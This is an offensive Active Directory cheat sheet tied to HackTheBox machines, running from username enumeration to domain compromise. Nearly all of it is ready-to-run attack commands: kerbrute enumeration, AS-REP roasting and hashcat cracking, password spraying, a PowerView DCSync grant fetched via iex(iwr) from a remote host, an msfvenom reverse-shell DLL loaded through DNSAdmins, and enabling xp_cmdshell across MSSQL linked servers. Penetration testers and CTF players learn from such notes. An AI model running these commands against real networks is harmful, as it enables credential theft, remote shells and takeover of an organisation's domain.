# Active Directory (Recon -> PE)

## Enumeration

> Enumeration is the key

* Enumerate usernames from every source available
  * RPC
  * SMB
  * LDAP
  * Web servers
  * HTTPS/SSL certificates
  * WinRM (if exposed)
  * Enumerate via SIDs (RID cycling)

## Default Checklists

* Check for anonymous, guest and null sessions on every exposed service
* RPC

```bash
rpcclient -U '' -N 10.10.10.10 -c 'enumdomusers'
```

* SMB

```bash
smbclient -N -U '' -L 10.10.10.10
cme smb 10.10.10.10 -u 'anonymous' -p 'anonymous' --shares
cme smb 10.10.10.10 -u 'Guest' -p '' --shares
cme smb 10.10.10.10 -u 'Guest' -p '' --rid-brute
```

* LDAP

```bash
# first query the root DSE for the naming contexts, then use the base DN it returns
ldapsearch -H ldap://$ip -x -s base namingcontexts
ldapsearch -H ldap://$ip -x -b "DC=domain,DC=tld" '(objectClass=person)'
windapsearch -d domain.tld -u '' -p '' -m users
```

* Web servers: collect names from contact pages, team/members pages, document metadata, etc.
* SSL certificates
  * Organization name and the domain names in the Subject and SAN fields
  * Sometimes a registered admin's name or email address in the certificate details

* Enumerate via SIDs (RID cycling)

```bash
lookupsid.py anonymous@10.10.10.10 -no-pass
lookupsid.py guest@10.10.10.10 -no-pass
```

## Identify

* After collecting candidate usernames, identify which of them actually exist in the domain under test
* This can be done with kerbrute: it sends an AS-REQ for each name and the KDC's error code tells unknown principals apart from existing ones. It does not touch the bad-password counter, so it will not lock anyone out, but every probe is logged on the DC as event 4768

```bash
# add the domain name from the nmap output to /etc/hosts first
kerbrute userenum -d domain.tld --dc 10.10.10.10 usernames.txt -o valid_users.txt
```

* Now filter the valid users out of that log and save just the bare usernames (without the `@domain` part) to a new file

```bash
grep 'VALID USERNAME' valid_users.txt | awk '{print $7}' | cut -d@ -f1 > users
```

* With the user names in hand, find which accounts have `Do not require Kerberos preauthentication` set, using `GetNPUsers.py` from impacket. For such an account the KDC hands out an AS-REP without checking anything first; its encrypted part is keyed with the user's password hash, so it can be cracked offline (AS-REP roasting)

```bash
GetNPUsers.py -usersfile users -outputfile hash -dc-ip 10.10.10.10 domain.tld/
hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
```
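As an added example (not from the original notes) covering both the filtering step and the hash step above: a small shell helper that turns kerbrute's log into the bare usernames GetNPUsers.py expects and maps each AS-REP hash to its hashcat mode from the `$krb5asrep$<etype>$` prefix. The kerbrute lines and the hash are constructed samples; the domain and host are placeholders.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): prepare kerbrute output for
# GetNPUsers.py and pick the hashcat mode for the AS-REP hashes it writes.
# Sample lines are constructed, not real output.

# kerbrute userenum writes lines like:
#   2020/07/01 10:00:01 >  [+] VALID USERNAME:       hsmith@domain.tld
# $7 is user@domain; GetNPUsers.py wants the bare sAMAccountName, so strip the realm.
kerbrute_valid_users() {
    grep 'VALID USERNAME' | awk '{print $7}' | cut -d@ -f1 | sort -u
}

# GetNPUsers.py writes one hash per line: $krb5asrep$<etype>$user@REALM:<checksum>$<edata>.
# etype 23 (RC4-HMAC, what GetNPUsers.py requests by default) is hashcat mode 18200.
# Any other etype is refused rather than guessed, so the operator looks the mode up.
asrep_hashcat_mode() {
    case "$1" in
        '$krb5asrep$23$'*) echo 18200 ;;
        *) echo "unsupported etype in: ${1%%:*}" >&2; return 1 ;;
    esac
}

# Constructed kerbrute log: banner, two valid users (one of them seen twice), trailer.
SAMPLE_KERBRUTE='2020/07/01 10:00:00 >  Using KDC(s):
2020/07/01 10:00:00 >  10.10.10.10:88
2020/07/01 10:00:01 >  [+] VALID USERNAME:       hsmith@domain.tld
2020/07/01 10:00:01 >  [+] VALID USERNAME:       svc_backup@domain.tld
2020/07/01 10:00:01 >  [+] svc_backup has no pre auth required. Dumping hash to crack offline:
2020/07/01 10:00:02 >  [+] VALID USERNAME:       hsmith@domain.tld
2020/07/01 10:00:02 >  Done! Tested 4 usernames (2 valid) in 1.2 seconds'

# Constructed AS-REP hash in the layout GetNPUsers.py uses (checksum and edata are dummies).
SAMPLE_HASH='$krb5asrep$23$svc_backup@DOMAIN.TLD:0123456789abcdef$00112233'

printf '%s\n' "$SAMPLE_KERBRUTE" | kerbrute_valid_users   # hsmith, svc_backup
asrep_hashcat_mode "$SAMPLE_HASH"                          # 18200
```

With real files: `kerbrute_valid_users < valid_users.txt > users`, then `hashcat -m "$(asrep_hashcat_mode "$(head -n1 hash)")" hash wordlist`.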

## Enumerate Again

* Once valid credentials for a domain user are obtained, enumerate the services again as an authenticated user; shares, RPC queries and LDAP attributes that were hidden from null sessions are often readable now
* SMB

```bash
crackmapexec smb 10.10.10.10 -u 'user' -p 'password' --shares
smbclient -U 'user' //10.10.10.10/share
```

* RPC

```bash
rpcclient -U 'user%password' 10.10.10.10
```

* WinRM

```bash
evil-winrm -i 10.10.10.10 -u 'user' -p 'password'
```

* LDAP

```bash
windapsearch -d domain.tld -u 'user' -p 'password' -m users   # choose any module
```

## Password Spraying

* Check the domain lockout policy first (threshold and observation window, e.g. with crackmapexec's `--pass-pol`) and stay under it: one password across all users per window is the safe pattern
* CME

```bash
cme smb 10.10.10.10 -u users -p 'password' --continue-on-success
```

## Network Enumeration

* When the manual checks run dry, use the domain user's credentials to collect the whole domain with BloodHound; the resulting graph shows the group memberships and ACL abuses that lead towards exploitation

```bash
bloodhound-python -c all -u 'user' -p 'password' -d domain.tld -ns 10.10.10.10
```

### BloodHound Permissions

* **WriteOwner** - you can take ownership of the object and then grant yourself whatever rights you need - <https://0xdf.gitlab.io/2018/11/10/htb-reel.html#privesc-tom---claire>
* **GetChanges/GetChangesAll** - the two replication rights that together allow DCSync - <https://0xdf.gitlab.io/2020/07/18/htb-sauna.html#priv-svc_loanmgr--root>
* **WriteDACL** - you can edit the object's ACL; on the domain object that means granting yourself DCSync
  * On the domain - <https://0xdf.gitlab.io/2020/03/21/htb-forest.html#privesc-to-administrator>

```powershell
# ippsec's PowerView method (0xdf did the same with a one-liner): add a DCSync ACE for our user on the domain object, then dump the hashes with secretsdump.py
iex(iwr -uri http://10.10.10.10/PowerView.ps1 -usebasicparsing)
$SecPassword = ConvertTo-SecureString 'ippsec123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB\dnoscp', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity "dnoscp" -Rights DCSync
```

### Active Directory Recycle Bin

* Get information about deleted objects (needs the Recycle Bin optional feature enabled and read access to the Deleted Objects container; the second query pulls every attribute the object still carries, which is where leftover secrets turn up)

```powershell
Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -IncludeDeletedObjects
Get-ADObject -Filter { SAMAccountName -eq "TempAdmin" } -IncludeDeletedObjects -Properties *
```

#### Machine

* Cascade - <https://0xdf.gitlab.io/2020/07/25/htb-cascade.html#privesc-arksvc--administrator>

## Group Exploitation

### DNSAdmins

* Members of DNSAdmins can make the DNS service load an arbitrary DLL (ServerLevelPluginDll); the service runs as SYSTEM on the DC, so a reverse-shell DLL gives a SYSTEM shell once the service is restarted. Restarting it requires service-control rights on `dns`, which DNSAdmins often but not always have, and DNS resolution on that DC is broken while the payload DLL is configured: remove the `ServerLevelPluginDll` value under `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters` and restart the service afterwards

```bash
# on the attacker: build the DLL and serve it over SMB (LHOST is the attacker's IP)
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > privesc.dll
impacket-smbserver share .
# on the target, as a DNSAdmins member: point the DNS service at the DLL and restart it
dnscmd.exe 127.0.0.1 /config /serverlevelplugindll \\10.10.10.10\share\privesc.dll
sc.exe stop dns
sc.exe start dns
```

#### Machine

* Resolute - <https://0xdf.gitlab.io/2020/05/30/htb-resolute.html#priv-ryan--system>

## Post Exploit

* Get domain information

```powershell
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
```

* Automated enumeration

```powershell
# PowerView (domain recon): https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# PowerUp (local privesc checks): https://github.com/PowerShellMafia/PowerSploit/blob/dev/Privesc/PowerUp.ps1
powershell.exe -ep bypass -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
```

## Database Enumeration

```powershell
# https://github.com/NetSPI/PowerUpSQL
Get-SQLServerLink -Instance server -Verbose
powershell.exe -ep bypass -c "Import-Module C:\Users\Public\PowerUpSQL.ps1; Invoke-SQLEscalatePriv -Verbose -Instance ECORP\sql"
# Follow the chain of linked servers and run a query on each (xp_cmdshell only works where it is enabled)
Get-SQLServerLinkCrawl -Instance server -Query "exec master..xp_cmdshell 'whoami'"
# The Metasploit module exploit/windows/mssql/mssql_linkcrawler also walks the links and reports where you are sysadmin
```

```sql
-- Native: list the linked servers
SELECT srvname FROM master..sysservers;
-- Tables of a database on a linked server
SELECT * FROM OPENQUERY("ECORP\FOO", 'SELECT TABLE_NAME FROM FOO.INFORMATION_SCHEMA.TABLES');
-- Linked servers as seen from the remote side (second hop)
SELECT * FROM OPENQUERY("server", 'SELECT * FROM master..sysservers');
-- If IMPERSONATE is granted, switch to a user that is sysadmin over the link
EXECUTE AS USER = 'internal_user';
-- Enable xp_cmdshell on the linked server ("RPC Out" must be enabled on the link for EXECUTE ... AT)
EXECUTE ('sp_configure ''show advanced options'', 1; RECONFIGURE;') AT "server";
EXECUTE ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT "server";
```

* Offensive enumeration methods :thumbsup::thumbsup::thumbsup::thumbsup::thumbsup: <https://0xsp.com/offensive/red-team-cheatsheet/>
